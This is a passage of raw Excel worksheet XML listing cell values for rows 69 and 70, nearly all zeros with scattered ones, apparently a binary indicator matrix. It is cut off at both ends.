      <c r="JL69">
        <v>0</v>
      </c>
      <c r="JM69">
        <v>0</v>
      </c>
      <c r="JN69">
        <v>0</v>
      </c>
      <c r="JO69">
        <v>0</v>
      </c>
      <c r="JP69">
        <v>0</v>
      </c>
      <c r="JQ69">
        <v>1</v>
      </c>
      <c r="JR69">
        <v>0</v>
      </c>
      <c r="JS69">
        <v>0</v>
      </c>
      <c r="JT69">
        <v>0</v>
      </c>
      <c r="JU69">
        <v>0</v>
      </c>
      <c r="JV69">
        <v>0</v>
      </c>
      <c r="JW69">
        <v>0</v>
      </c>
      <c r="JX69">
        <v>0</v>
      </c>
      <c r="JY69">
        <v>0</v>
      </c>
      <c r="JZ69">
        <v>0</v>
      </c>
      <c r="KA69">
        <v>0</v>
      </c>
      <c r="KB69">
        <v>0</v>
      </c>
      <c r="KC69">
        <v>0</v>
      </c>
      <c r="KD69">
        <v>0</v>
      </c>
      <c r="KE69">
        <v>0</v>
      </c>
      <c r="KF69">
        <v>0</v>
      </c>
      <c r="KG69">
        <v>0</v>
      </c>
      <c r="KH69">
        <v>0</v>
      </c>
      <c r="KI69">
        <v>0</v>
      </c>
      <c r="KJ69">
        <v>0</v>
      </c>
      <c r="KK69">
        <v>0</v>
      </c>
      <c r="KL69">
        <v>0</v>
      </c>
      <c r="KM69">
        <v>0</v>
      </c>
      <c r="KN69">
        <v>0</v>
      </c>
      <c r="KO69">
        <v>0</v>
      </c>
      <c r="KP69">
        <v>0</v>
      </c>
      <c r="KQ69">
        <v>0</v>
      </c>
      <c r="KR69">
        <v>0</v>
      </c>
      <c r="KS69">
        <v>0</v>
      </c>
      <c r="KT69">
        <v>0</v>
      </c>
      <c r="KU69">
        <v>0</v>
      </c>
      <c r="KV69">
        <v>0</v>
      </c>
      <c r="KW69">
        <v>0</v>
      </c>
      <c r="KX69">
        <v>0</v>
      </c>
      <c r="KY69">
        <v>0</v>
      </c>
      <c r="KZ69">
        <v>1</v>
      </c>
      <c r="LA69">
        <v>0</v>
      </c>
      <c r="LB69">
        <v>0</v>
      </c>
      <c r="LC69">
        <v>0</v>
      </c>
      <c r="LD69">
        <v>0</v>
      </c>
      <c r="LE69">
        <v>0</v>
      </c>
      <c r="LF69">
        <v>1</v>
      </c>
      <c r="LG69">
        <v>0</v>
      </c>
      <c r="LH69">
        <v>0</v>
      </c>
      <c r="LI69">
        <v>0</v>
      </c>
      <c r="LJ69">
        <v>0</v>
      </c>
      <c r="LK69">
        <v>0</v>
      </c>
      <c r="LL69">
        <v>0</v>
      </c>
      <c r="LM69">
        <v>0</v>
      </c>
      <c r="LN69">
        <v>0</v>
      </c>
      <c r="LO69">
        <v>0</v>
      </c>
      <c r="LP69">
        <v>0</v>
      </c>
      <c r="LQ69">
        <v>0</v>
      </c>
      <c r="LR69">
        <v>1</v>
      </c>
      <c r="LS69">
        <v>0</v>
      </c>
      <c r="LT69">
        <v>0</v>
      </c>
      <c r="LU69">
        <v>0</v>
      </c>
      <c r="LV69">
        <v>0</v>
      </c>
      <c r="LW69">
        <v>0</v>
      </c>
      <c r="LX69">
        <v>0</v>
      </c>
      <c r="LY69">
        <v>0</v>
      </c>
      <c r="LZ69">
        <v>0</v>
      </c>
      <c r="MA69">
        <v>1</v>
      </c>
      <c r="MB69">
        <v>0</v>
      </c>
      <c r="MC69">
        <v>0</v>
      </c>
      <c r="MD69">
        <v>0</v>
      </c>
      <c r="ME69">
        <v>0</v>
      </c>
      <c r="MF69">
        <v>0</v>
      </c>
      <c r="MG69">
        <v>0</v>
      </c>
      <c r="MH69">
        <v>0</v>
      </c>
      <c r="MI69">
        <v>0</v>
      </c>
      <c r="MJ69">
        <v>0</v>
      </c>
      <c r="MK69">
        <v>0</v>
      </c>
      <c r="ML69">
        <v>0</v>
      </c>
      <c r="MM69">
        <v>0</v>
      </c>
      <c r="MN69">
        <v>0</v>
      </c>
      <c r="MO69">
        <v>0</v>
      </c>
      <c r="MP69">
        <v>0</v>
      </c>
      <c r="MQ69">
        <v>0</v>
      </c>
      <c r="MR69">
        <v>0</v>
      </c>
      <c r="MS69">
        <v>0</v>
      </c>
      <c r="MT69">
        <v>0</v>
      </c>
      <c r="MU69">
        <v>0</v>
      </c>
      <c r="MV69">
        <v>0</v>
      </c>
      <c r="MW69">
        <v>0</v>
      </c>
      <c r="MX69">
        <v>0</v>
      </c>
      <c r="MY69">
        <v>1</v>
      </c>
      <c r="MZ69">
        <v>0</v>
      </c>
      <c r="NA69">
        <v>0</v>
      </c>
      <c r="NB69">
        <v>0</v>
      </c>
      <c r="NC69">
        <v>0</v>
      </c>
      <c r="ND69">
        <v>0</v>
      </c>
      <c r="NE69">
        <v>0</v>
      </c>
      <c r="NF69">
        <v>0</v>
      </c>
      <c r="NG69">
        <v>0</v>
      </c>
      <c r="NH69">
        <v>0</v>
      </c>
      <c r="NI69">
        <v>0</v>
      </c>
      <c r="NJ69">
        <v>0</v>
      </c>
      <c r="NK69">
        <v>0</v>
      </c>
      <c r="NL69">
        <v>0</v>
      </c>
      <c r="NM69">
        <v>0</v>
      </c>
      <c r="NN69">
        <v>0</v>
      </c>
      <c r="NO69">
        <v>0</v>
      </c>
      <c r="NP69">
        <v>0</v>
      </c>
      <c r="NQ69">
        <v>0</v>
      </c>
      <c r="NR69">
        <v>0</v>
      </c>
      <c r="NS69">
        <v>0</v>
      </c>
      <c r="NT69">
        <v>0</v>
      </c>
      <c r="NU69">
        <v>0</v>
      </c>
      <c r="NV69">
        <v>1</v>
      </c>
      <c r="NW69">
        <v>0</v>
      </c>
      <c r="NX69">
        <v>0</v>
      </c>
      <c r="NY69">
        <v>0</v>
      </c>
      <c r="NZ69">
        <v>0</v>
      </c>
      <c r="OA69">
        <v>0</v>
      </c>
      <c r="OB69">
        <v>0</v>
      </c>
      <c r="OC69">
        <v>0</v>
      </c>
      <c r="OD69">
        <v>0</v>
      </c>
      <c r="OE69">
        <v>0</v>
      </c>
      <c r="OF69">
        <v>0</v>
      </c>
      <c r="OG69">
        <v>0</v>
      </c>
      <c r="OH69">
        <v>0</v>
      </c>
      <c r="OI69">
        <v>0</v>
      </c>
      <c r="OJ69">
        <v>1</v>
      </c>
      <c r="OK69">
        <v>0</v>
      </c>
      <c r="OL69">
        <v>0</v>
      </c>
      <c r="OM69">
        <v>0</v>
      </c>
      <c r="ON69">
        <v>0</v>
      </c>
      <c r="OO69">
        <v>0</v>
      </c>
      <c r="OP69">
        <v>0</v>
      </c>
      <c r="OQ69">
        <v>0</v>
      </c>
      <c r="OR69">
        <v>0</v>
      </c>
      <c r="OS69">
        <v>0</v>
      </c>
      <c r="OT69">
        <v>0</v>
      </c>
      <c r="OU69">
        <v>0</v>
      </c>
      <c r="OV69">
        <v>0</v>
      </c>
      <c r="OW69">
        <v>0</v>
      </c>
      <c r="OX69">
        <v>0</v>
      </c>
      <c r="OY69">
        <v>0</v>
      </c>
      <c r="OZ69">
        <v>0</v>
      </c>
      <c r="PA69">
        <v>0</v>
      </c>
      <c r="PB69">
        <v>0</v>
      </c>
      <c r="PC69">
        <v>0</v>
      </c>
      <c r="PD69">
        <v>0</v>
      </c>
      <c r="PE69">
        <v>0</v>
      </c>
      <c r="PF69">
        <v>0</v>
      </c>
      <c r="PG69">
        <v>0</v>
      </c>
      <c r="PH69">
        <v>0</v>
      </c>
      <c r="PI69">
        <v>0</v>
      </c>
      <c r="PJ69">
        <v>0</v>
      </c>
      <c r="PK69">
        <v>0</v>
      </c>
      <c r="PL69">
        <v>0</v>
      </c>
      <c r="PM69">
        <v>0</v>
      </c>
      <c r="PN69">
        <v>0</v>
      </c>
      <c r="PO69">
        <v>0</v>
      </c>
      <c r="PP69">
        <v>0</v>
      </c>
      <c r="PQ69">
        <v>0</v>
      </c>
      <c r="PR69">
        <v>0</v>
      </c>
      <c r="PS69">
        <v>0</v>
      </c>
      <c r="PT69">
        <v>0</v>
      </c>
      <c r="PU69">
        <v>0</v>
      </c>
      <c r="PV69">
        <v>0</v>
      </c>
      <c r="PW69">
        <v>0</v>
      </c>
      <c r="PX69">
        <v>0</v>
      </c>
      <c r="PY69">
        <v>0</v>
      </c>
      <c r="PZ69">
        <v>0</v>
      </c>
      <c r="QA69">
        <v>0</v>
      </c>
      <c r="QB69">
        <v>0</v>
      </c>
      <c r="QC69">
        <v>0</v>
      </c>
      <c r="QD69">
        <v>0</v>
      </c>
      <c r="QE69">
        <v>0</v>
      </c>
      <c r="QF69">
        <v>0</v>
      </c>
      <c r="QG69">
        <v>0</v>
      </c>
      <c r="QH69">
        <v>0</v>
      </c>
      <c r="QI69">
        <v>0</v>
      </c>
      <c r="QJ69">
        <v>0</v>
      </c>
      <c r="QK69">
        <v>0</v>
      </c>
      <c r="QL69">
        <v>0</v>
      </c>
      <c r="QM69">
        <v>0</v>
      </c>
      <c r="QN69">
        <v>0</v>
      </c>
      <c r="QO69">
        <v>0</v>
      </c>
      <c r="QP69">
        <v>1</v>
      </c>
      <c r="QQ69">
        <v>0</v>
      </c>
      <c r="QR69">
        <v>0</v>
      </c>
      <c r="QS69">
        <v>0</v>
      </c>
      <c r="QT69">
        <v>0</v>
      </c>
      <c r="QU69">
        <v>0</v>
      </c>
      <c r="QV69">
        <v>0</v>
      </c>
      <c r="QW69">
        <v>0</v>
      </c>
      <c r="QX69">
        <v>0</v>
      </c>
      <c r="QY69">
        <v>0</v>
      </c>
      <c r="QZ69">
        <v>0</v>
      </c>
      <c r="RA69">
        <v>0</v>
      </c>
      <c r="RB69">
        <v>0</v>
      </c>
      <c r="RC69">
        <v>0</v>
      </c>
      <c r="RD69">
        <v>0</v>
      </c>
      <c r="RE69">
        <v>0</v>
      </c>
      <c r="RF69">
        <v>0</v>
      </c>
      <c r="RG69">
        <v>0</v>
      </c>
      <c r="RH69">
        <v>0</v>
      </c>
      <c r="RI69">
        <v>0</v>
      </c>
      <c r="RJ69">
        <v>0</v>
      </c>
      <c r="RK69">
        <v>0</v>
      </c>
      <c r="RL69">
        <v>0</v>
      </c>
      <c r="RM69">
        <v>0</v>
      </c>
      <c r="RN69">
        <v>0</v>
      </c>
      <c r="RO69">
        <v>0</v>
      </c>
      <c r="RP69">
        <v>0</v>
      </c>
      <c r="RQ69">
        <v>0</v>
      </c>
      <c r="RR69">
        <v>0</v>
      </c>
      <c r="RS69">
        <v>0</v>
      </c>
      <c r="RT69">
        <v>0</v>
      </c>
      <c r="RU69">
        <v>0</v>
      </c>
      <c r="RV69">
        <v>0</v>
      </c>
      <c r="RW69">
        <v>0</v>
      </c>
      <c r="RX69">
        <v>0</v>
      </c>
      <c r="RY69">
        <v>0</v>
      </c>
      <c r="RZ69">
        <v>0</v>
      </c>
      <c r="SA69">
        <v>0</v>
      </c>
    </row>
    <row r="70" spans="1:495" x14ac:dyDescent="0.2">
      <c r="A70" s="6" t="s">
        <v>3174</v>
      </c>
      <c r="B70">
        <v>4</v>
      </c>
      <c r="C70">
        <v>0</v>
      </c>
      <c r="D70">
        <v>0</v>
      </c>
      <c r="E70">
        <v>0</v>
      </c>
      <c r="F70">
        <v>0</v>
      </c>
      <c r="G70">
        <v>0</v>
      </c>
      <c r="H70">
        <v>0</v>
      </c>
      <c r="I70">
        <v>0</v>
      </c>
      <c r="J70">
        <v>0</v>
      </c>
      <c r="K70">
        <v>0</v>
      </c>
      <c r="L70">
        <v>0</v>
      </c>
      <c r="M70">
        <v>0</v>
      </c>
      <c r="N70">
        <v>0</v>
      </c>
      <c r="O70">
        <v>0</v>
      </c>
      <c r="P70">
        <v>0</v>
      </c>
      <c r="Q70">
        <v>0</v>
      </c>
      <c r="R70">
        <v>0</v>
      </c>
      <c r="S70">
        <v>0</v>
      </c>
      <c r="T70">
        <v>0</v>
      </c>
      <c r="U70">
        <v>0</v>
      </c>
      <c r="V70">
        <v>0</v>
      </c>
      <c r="W70">
        <v>1</v>
      </c>
      <c r="X70">
        <v>0</v>
      </c>
      <c r="Y70">
        <v>0</v>
      </c>
      <c r="Z70">
        <v>0</v>
      </c>
      <c r="AA70">
        <v>0</v>
      </c>
      <c r="AB70">
        <v>0</v>
      </c>
      <c r="AC70">
        <v>0</v>
      </c>
      <c r="AD70">
        <v>0</v>
      </c>
      <c r="AE70">
        <v>0</v>
      </c>
      <c r="AF70">
        <v>0</v>
      </c>
      <c r="AG70">
        <v>0</v>
      </c>
      <c r="AH70">
        <v>0</v>
      </c>
      <c r="AI70">
        <v>0</v>
      </c>
      <c r="AJ70">
        <v>0</v>
      </c>
      <c r="AK70">
        <v>0</v>
      </c>
      <c r="AL70">
        <v>0</v>
      </c>
      <c r="AM70">
        <v>0</v>
      </c>
      <c r="AN70">
        <v>0</v>
      </c>
      <c r="AO70">
        <v>0</v>
      </c>
      <c r="AP70">
        <v>0</v>
      </c>
      <c r="AQ70">
        <v>0</v>
      </c>
      <c r="AR70">
        <v>0</v>
      </c>
      <c r="AS70">
        <v>0</v>
      </c>
      <c r="AT70">
        <v>0</v>
      </c>
      <c r="AU70">
        <v>0</v>
      </c>
      <c r="AV70">
        <v>0</v>
      </c>
      <c r="AW70">
        <v>0</v>
      </c>
      <c r="AX70">
        <v>0</v>
      </c>
      <c r="AY70">
        <v>0</v>
      </c>
      <c r="AZ70">
        <v>0</v>
      </c>
      <c r="BA70">
        <v>0</v>
      </c>
      <c r="BB70">
        <v>0</v>
      </c>
      <c r="BC70">
        <v>0</v>
      </c>
      <c r="BD70">
        <v>0</v>
      </c>
      <c r="BE70">
        <v>0</v>
      </c>
      <c r="BF70">
        <v>0</v>
      </c>
      <c r="BG70">
        <v>0</v>
      </c>
      <c r="BH70">
        <v>0</v>
      </c>
      <c r="BI70">
        <v>0</v>
      </c>
      <c r="BJ70">
        <v>0</v>
      </c>
      <c r="BK70">
        <v>0</v>
      </c>
      <c r="BL70">
        <v>0</v>
      </c>
      <c r="BM70">
        <v>0</v>
      </c>
      <c r="BN70">
        <v>0</v>
      </c>
      <c r="BO70">
        <v>0</v>
      </c>
      <c r="BP70">
        <v>0</v>
      </c>
      <c r="BQ70">
        <v>0</v>
      </c>
      <c r="BR70">
        <v>0</v>
      </c>
      <c r="BS70">
        <v>0</v>
      </c>
      <c r="BT70">
        <v>0</v>
      </c>
      <c r="BU70">
        <v>0</v>
      </c>
      <c r="BV70">
        <v>0</v>
      </c>
      <c r="BW70">
        <v>0</v>
      </c>
      <c r="BX70">
        <v>0</v>
      </c>
      <c r="BY70">
        <v>0</v>
      </c>
      <c r="BZ70">
        <v>0</v>
      </c>
      <c r="CA70">
        <v>0</v>
      </c>
      <c r="CB70">
        <v>0</v>
      </c>
      <c r="CC70">
        <v>0</v>
      </c>
      <c r="CD70">
        <v>0</v>
      </c>
      <c r="CE70">
        <v>0</v>
      </c>
      <c r="CF70">
        <v>0</v>
      </c>
      <c r="CG70">
        <v>0</v>
      </c>
      <c r="CH70">
        <v>0</v>
      </c>
      <c r="CI70">
        <v>0</v>
      </c>
      <c r="CJ70">
        <v>0</v>
      </c>
      <c r="CK70">
        <v>0</v>
      </c>
      <c r="CL70">
        <v>0</v>
      </c>
      <c r="CM70">
        <v>0</v>
      </c>
      <c r="CN70">
        <v>0</v>
      </c>
      <c r="CO70">
        <v>0</v>
      </c>
      <c r="CP70">
        <v>0</v>
      </c>
      <c r="CQ70">
        <v>0</v>
      </c>
      <c r="CR70">
        <v>0</v>
      </c>
      <c r="CS70">
        <v>0</v>
      </c>
      <c r="CT70">
        <v>0</v>
      </c>
      <c r="CU70">
        <v>0</v>
      </c>
      <c r="CV70">
        <v>0</v>
      </c>
      <c r="CW70">
        <v>0</v>
      </c>
      <c r="CX70">
        <v>0</v>
      </c>
      <c r="CY70">
        <v>0</v>
      </c>
      <c r="CZ70">
        <v>0</v>
      </c>
      <c r="DA70">
        <v>0</v>
      </c>
      <c r="DB70">
        <v>0</v>
      </c>
      <c r="DC70">
        <v>0</v>
      </c>
      <c r="DD70">
        <v>0</v>
      </c>
      <c r="DE70">
        <v>0</v>
      </c>
      <c r="DF70">
        <v>0</v>
      </c>
      <c r="DG70">
        <v>0</v>
      </c>
      <c r="DH70">
        <v>0</v>
      </c>
      <c r="DI70">
        <v>0</v>
      </c>
      <c r="DJ70">
        <v>0</v>
      </c>
      <c r="DK70">
        <v>0</v>
      </c>
      <c r="DL70">
        <v>0</v>
      </c>
      <c r="DM70">
        <v>0</v>
      </c>
      <c r="DN70">
        <v>0</v>
      </c>
      <c r="DO70">
        <v>0</v>
      </c>
      <c r="DP70">
        <v>0</v>
      </c>
      <c r="DQ70">
        <v>0</v>
      </c>
      <c r="DR70">
        <v>0</v>
      </c>
      <c r="DS70">
        <v>0</v>
      </c>
      <c r="DT70">
        <v>0</v>
      </c>
      <c r="DU70">
        <v>0</v>
      </c>
      <c r="DV70">
        <v>0</v>
      </c>
      <c r="DW70">
        <v>0</v>
      </c>
      <c r="DX70">
        <v>0</v>
      </c>
      <c r="DY70">
        <v>0</v>
      </c>
      <c r="DZ70">
        <v>0</v>
      </c>
      <c r="EA70">
        <v>0</v>
      </c>
      <c r="EB70">
        <v>0</v>
      </c>
      <c r="EC70">
        <v>0</v>
      </c>
      <c r="ED70">
        <v>0</v>
      </c>
      <c r="EE70">
        <v>0</v>
      </c>
      <c r="EF70">
        <v>0</v>
      </c>
      <c r="EG70">
        <v>0</v>
      </c>
      <c r="EH70">
        <v>0</v>
      </c>
      <c r="EI70">
        <v>0</v>
      </c>
      <c r="EJ70">
        <v>0</v>
      </c>
      <c r="EK70">
        <v>0</v>
      </c>
      <c r="EL70">
        <v>0</v>
      </c>
      <c r="EM70">
        <v>0</v>
      </c>
      <c r="EN70">
        <v>0</v>
      </c>
      <c r="EO70">
        <v>0</v>
      </c>
      <c r="EP70">
        <v>0</v>
      </c>
      <c r="EQ70">
        <v>0</v>
      </c>
      <c r="ER70">
        <v>0</v>
      </c>
      <c r="ES70">
        <v>0</v>
      </c>
      <c r="ET70">
        <v>0</v>
      </c>
      <c r="EU70">
        <v>0</v>
      </c>
      <c r="EV70">
        <v>0</v>
      </c>
      <c r="EW70">
        <v>0</v>
      </c>
      <c r="EX70">
        <v>0</v>
      </c>
      <c r="EY70">
        <v>0</v>
      </c>
      <c r="EZ70">
        <v>0</v>
      </c>
      <c r="FA70">
        <v>0</v>
      </c>
      <c r="FB70">
        <v>0</v>
      </c>
      <c r="FC70">
        <v>1</v>
      </c>
      <c r="FD70">
        <v>0</v>
      </c>
      <c r="FE70">
        <v>0</v>
      </c>
      <c r="FF70">
        <v>0</v>
      </c>
      <c r="FG70">
        <v>0</v>
      </c>
      <c r="FH70">
        <v>0</v>
      </c>
      <c r="FI70">
        <v>0</v>
      </c>
      <c r="FJ70">
        <v>0</v>
      </c>
      <c r="FK70">
        <v>0</v>
      </c>
      <c r="FL70">
        <v>0</v>
      </c>
      <c r="FM70">
        <v>0</v>
      </c>
      <c r="FN70">
        <v>0</v>
      </c>
      <c r="FO70">
        <v>0</v>
      </c>
      <c r="FP70">
        <v>0</v>
      </c>
      <c r="FQ70">
        <v>0</v>
      </c>
      <c r="FR70">
        <v>0</v>
      </c>
      <c r="FS70">
        <v>0</v>
      </c>
      <c r="FT70">
        <v>0</v>
      </c>
      <c r="FU70">
        <v>0</v>
      </c>
      <c r="FV70">
        <v>0</v>
      </c>
      <c r="FW70">
        <v>0</v>
      </c>
      <c r="FX70">
        <v>0</v>
      </c>
      <c r="FY70">
        <v>0</v>
      </c>
      <c r="FZ70">
        <v>0</v>
      </c>
      <c r="GA70">
        <v>0</v>
      </c>
      <c r="GB70">
        <v>0</v>
      </c>
      <c r="GC70">
        <v>0</v>
      </c>
      <c r="GD70">
        <v>0</v>
      </c>
      <c r="GE70">
        <v>0</v>
      </c>
      <c r="GF70">
        <v>0</v>
      </c>
      <c r="GG70">
        <v>0</v>
      </c>
      <c r="GH70">
        <v>0</v>
      </c>
      <c r="GI70">
        <v>0</v>
      </c>
      <c r="GJ70">
        <v>0</v>
      </c>
      <c r="GK70">
        <v>0</v>
      </c>
      <c r="GL70">
        <v>0</v>
      </c>
      <c r="GM70">
        <v>0</v>
      </c>
      <c r="GN70">
        <v>0</v>
      </c>
      <c r="GO70">
        <v>0</v>
      </c>
      <c r="GP70">
        <v>0</v>
      </c>
      <c r="GQ70">
        <v>0</v>
      </c>
      <c r="GR70">
        <v>0</v>
      </c>
      <c r="GS70">
        <v>0</v>
      </c>
      <c r="GT70">
        <v>0</v>
      </c>
      <c r="GU70">
        <v>0</v>
      </c>
      <c r="GV70">
        <v>0</v>
      </c>
      <c r="GW70">
        <v>0</v>
      </c>
      <c r="GX70">
        <v>0</v>
      </c>
      <c r="GY70">
        <v>0</v>
      </c>
      <c r="GZ70">
        <v>0</v>
      </c>
      <c r="HA70">
        <v>0</v>
      </c>
      <c r="HB70">
        <v>0</v>
      </c>
      <c r="HC70">
        <v>0</v>
      </c>
      <c r="HD70">
        <v>0</v>
      </c>
      <c r="HE70">
        <v>0</v>
      </c>
      <c r="HF70">
        <v>0</v>
      </c>
      <c r="HG70">
        <v>0</v>
      </c>
      <c r="HH70">
        <v>0</v>
      </c>
      <c r="HI70">
        <v>1</v>
      </c>
      <c r="HJ70">
        <v>0</v>
      </c>
      <c r="HK70">
        <v>0</v>
      </c>
      <c r="HL70">
        <v>0</v>
      </c>
      <c r="HM70">
        <v>0</v>
      </c>
      <c r="HN70">
        <v>0</v>
      </c>
      <c r="HO70">
        <v>0</v>
      </c>
      <c r="HP70">
        <v>0</v>
      </c>
      <c r="HQ70">
        <v>0</v>
      </c>
      <c r="HR70">
        <v>0</v>
      </c>
      <c r="HS70">
        <v>0</v>
      </c>
      <c r="HT70">
        <v>0</v>
      </c>
      <c r="HU70">
        <v>0</v>
      </c>
      <c r="HV70">
        <v>0</v>
      </c>
      <c r="HW70">
        <v>0</v>
      </c>
      <c r="HX70">
        <v>0</v>
      </c>
      <c r="HY70">
        <v>0</v>
      </c>
      <c r="HZ70">
        <v>0</v>
      </c>
      <c r="IA70">
        <v>0</v>
      </c>
      <c r="IB70">
        <v>0</v>
      </c>
      <c r="IC70">
        <v>0</v>
      </c>
      <c r="ID70">
        <v>0</v>
      </c>
      <c r="IE70">
        <v>0</v>
      </c>
      <c r="IF70">
        <v>0</v>
      </c>
      <c r="IG70">
        <v>0</v>
      </c>
      <c r="IH70">
        <v>0</v>
      </c>
      <c r="II70">
        <v>0</v>
      </c>
      <c r="IJ70">
        <v>0</v>
      </c>
      <c r="IK70">
        <v>0</v>
      </c>
      <c r="IL70">
        <v>0</v>
      </c>
      <c r="IM70">
        <v>0</v>
      </c>
      <c r="IN70">
        <v>0</v>
      </c>
      <c r="IO70">
        <v>0</v>
      </c>
      <c r="IP70">
        <v>0</v>
      </c>
      <c r="IQ70">
        <v>0</v>
      </c>
      <c r="IR70">
        <v>0</v>
      </c>
      <c r="IS70">
        <v>0</v>
      </c>
      <c r="IT70">
        <v>0</v>
      </c>
      <c r="IU70">
        <v>0</v>
      </c>
      <c r="IV70">
        <v>0</v>
      </c>
      <c r="IW70">
        <v>0</v>
      </c>
      <c r="IX70">
        <v>0</v>
      </c>
      <c r="IY70">
        <v>0</v>
      </c>
      <c r="IZ70">
        <v>0</v>
      </c>
      <c r="JA70">
        <v>0</v>
      </c>
      <c r="JB70">
        <v>0</v>
      </c>
      <c r="JC70">
        <v>0</v>
      </c>
      <c r="JD70">
        <v>0</v>
      </c>
      <c r="JE70">
        <v>0</v>
      </c>
      <c r="JF70">
        <v>0</v>
      </c>
      <c r="JG70">
        <v>0</v>
      </c>
      <c r="JH70">
        <v>0</v>
      </c>
      <c r="JI70">
        <v>0</v>
      </c>
      <c r="JJ70">
        <v>0</v>
      </c>
      <c r="JK70">
        <v>0</v>
      </c>
      <c r="JL70">
        <v>0</v>
      </c>
      <c r="JM70">
        <v>0</v>
      </c>
      <c r="JN70">
        <v>0</v>
      </c>
      <c r="JO70">
        <v>0</v>
      </c>
      <c r="JP70">
        <v>0</v>
      </c>
      <c r="JQ70">
        <v>0</v>
      </c>
      <c r="JR70">
        <v>0</v>
      </c>
      <c r="JS70">
        <v>0</v>
      </c>
      <c r="JT70">
        <v>0</v>
      </c>
      <c r="JU70">
        <v>0</v>
      </c>
      <c r="JV70">
        <v>0</v>
      </c>
      <c r="JW70">
        <v>0</v>
      </c>
      <c r="JX70">
        <v>0</v>
      </c>
      <c r="JY70">
        <v>0</v>
      </c>
      <c r="JZ70">
        <v>0</v>
      </c>
      <c r="KA70">
        <v>0</v>
      </c>
      <c r="KB70">
        <v>0</v>
      </c>
      <c r="KC70">
        <v>0</v>
      </c>
      <c r="KD70">
        <v>0</v>
      </c>
      <c r="KE70">
        <v>0</v>
      </c>
      <c r="KF70">
        <v>0</v>
      </c>
      <c r="KG70">
        <v>0</v>
      </c>
      <c r="KH70">
        <v>0</v>
      </c>
      <c r="KI70">
        <v>0</v>
      </c>
      <c r="KJ70">
        <v>0</v>
      </c>
      <c r="KK70">
        <v>0</v>
      </c>
      <c r="KL70">
        <v>0</v>
      </c>
      <c r="KM70">
        <v>0</v>
      </c>
      <c r="KN70">
        <v>0</v>
      </c>
      <c r="KO70">
        <v>0</v>
      </c>
      <c r="KP70">
        <v>0</v>
      </c>
      <c r="KQ70">
        <v>0</v>
      </c>
      <c r="KR70">
        <v>0</v>
      </c>
      <c r="KS70">
        <v>0</v>
      </c>
      <c r="KT70">
        <v>0</v>
      </c>
      <c r="KU70">
        <v>0</v>
      </c>
      <c r="KV70">
        <v>0</v>
      </c>
      <c r="KW70">
        <v>0</v>
      </c>
      <c r="KX70">
        <v>0</v>
      </c>
      <c r="KY70">
        <v>0</v>
      </c>
      <c r="KZ70">
        <v>0</v>
      </c>
      <c r="LA70">
        <v>0</v>
      </c>
      <c r="LB70">
        <v>0</v>
      </c>
      <c r="LC70">
        <v>0</v>
      </c>
      <c r="LD70">
        <v>0</v>
      </c>
      <c r="LE70">
        <v>0</v>
      </c>
      <c r="LF70">
        <v>0</v>
      </c>
      <c r="LG70">
        <v>0</v>
      </c>
      <c r="LH70">
        <v>0</v>
      </c>
      <c r="LI70">
        <v>0</v>
      </c>
      <c r="LJ70">
        <v>0</v>
      </c>
      <c r="LK70">
        <v>0</v>
      </c>
      <c r="LL70">
        <v>0</v>
      </c>
      <c r="LM70">
        <v>0</v>
      </c>
      <c r="LN70">
        <v>0</v>
      </c>
      <c r="LO70">
        <v>0</v>
      </c>
      <c r="LP70">
        <v>0</v>
      </c>
      <c r="LQ70">
        <v>0</v>
      </c>
      <c r="LR70">
        <v>0</v>
      </c>
      <c r="LS70">
        <v>0</v>
      </c>
      <c r="LT70">
        <v>0</v>
      </c>
      <c r="LU70">
        <v>0</v>
      </c>
      <c r="LV70">
        <v>0</v>
      </c>
      <c r="LW70">
        <v>0</v>
      </c>
      <c r="LX70">
        <v>0</v>
      </c>
      <c r="LY70">
        <v>0</v>
      </c>
      <c r="LZ70">
        <v>0</v>
      </c>
      <c r="MA70">
        <v>0</v>
      </c>
      <c r="MB70">
        <v>0</v>
      </c>
      <c r="MC70">
        <v>0</v>
      </c>
      <c r="MD70">
        <v>0</v>
      </c>
      <c r="ME70">
        <v>0</v>
      </c>
      <c r="MF70">
        <v>0</v>
      </c>
      <c r="MG70">
        <v>0</v>
      </c>
      <c r="MH70">
        <v>0</v>
      </c>
      <c r="MI70">
        <v>0</v>
      </c>
      <c r="MJ70">
        <v>0</v>
      </c>
      <c r="MK70">
        <v>0</v>
      </c>
      <c r="ML70">
        <v>0</v>
      </c>
      <c r="MM70">
        <v>0</v>
      </c>
      <c r="MN70">
        <v>0</v>
      </c>
      <c r="MO70">
        <v>0</v>
      </c>
      <c r="MP70">
        <v>0</v>
      </c>
      <c r="MQ70">
        <v>0</v>
      </c>
      <c r="MR70">
        <v>0</v>
      </c>
      <c r="MS70">
        <v>0</v>
      </c>
      <c r="MT70">
        <v>0</v>
      </c>
      <c r="MU70">
        <v>0</v>
      </c>
      <c r="MV70">
        <v>0</v>
      </c>
      <c r="MW70">
        <v>0</v>
      </c>
      <c r="MX70">
        <v>0</v>
      </c>
      <c r="MY70">
        <v>0</v>
      </c>
      <c r="MZ70">
        <v>0</v>
      </c>
      <c r="NA70">
        <v>0</v>
      </c>
      <c r="NB70">
        <v>0</v>
      </c>
      <c r="NC70">
        <v>0</v>
      </c>
      <c r="ND70">
        <v>0</v>
      </c>
      <c r="NE70">
        <v>0</v>
      </c>
      <c r="NF70">
        <v>0</v>
      </c>
      <c r="NG70">
        <v>0</v>
      </c>
      <c r="NH70">
        <v>0</v>
      </c>
      <c r="NI70">
        <v>0</v>
      </c>
      <c r="NJ70">
        <v>0</v>
      </c>
      <c r="NK70">
        <v>0</v>
      </c>
      <c r="NL70">
        <v>0</v>
      </c>
      <c r="NM70">
        <v>0</v>
      </c>
      <c r="NN70">
        <v>0</v>
      </c>
      <c r="NO70">
        <v>0</v>
      </c>
      <c r="NP70">
        <v>0</v>
      </c>
      <c r="NQ70">
        <v>0</v>
      </c>
      <c r="NR70">
        <v>0</v>
      </c>
      <c r="NS70">
        <v>0</v>
      </c>
      <c r="NT70">
        <v>0</v>
      </c>
      <c r="NU70">
        <v>0</v>
      </c>
      <c r="NV70">
        <v>0</v>
      </c>
      <c r="NW70">
        <v>0</v>
      </c>
      <c r="NX70">
        <v>0</v>
      </c>
      <c r="NY70">
        <v>0</v>
      </c>
      <c r="NZ70">
        <v>0</v>
      </c>
      <c r="OA70">
        <v>0</v>
      </c>
      <c r="OB70">
        <v>0</v>
      </c>
      <c r="OC70">
        <v>0</v>
      </c>
      <c r="OD70">
        <v>0</v>
      </c>
      <c r="OE70">
        <v>0</v>
      </c>
      <c r="OF70">
        <v>0</v>
      </c>
      <c r="OG70">
        <v>0</v>
      </c>
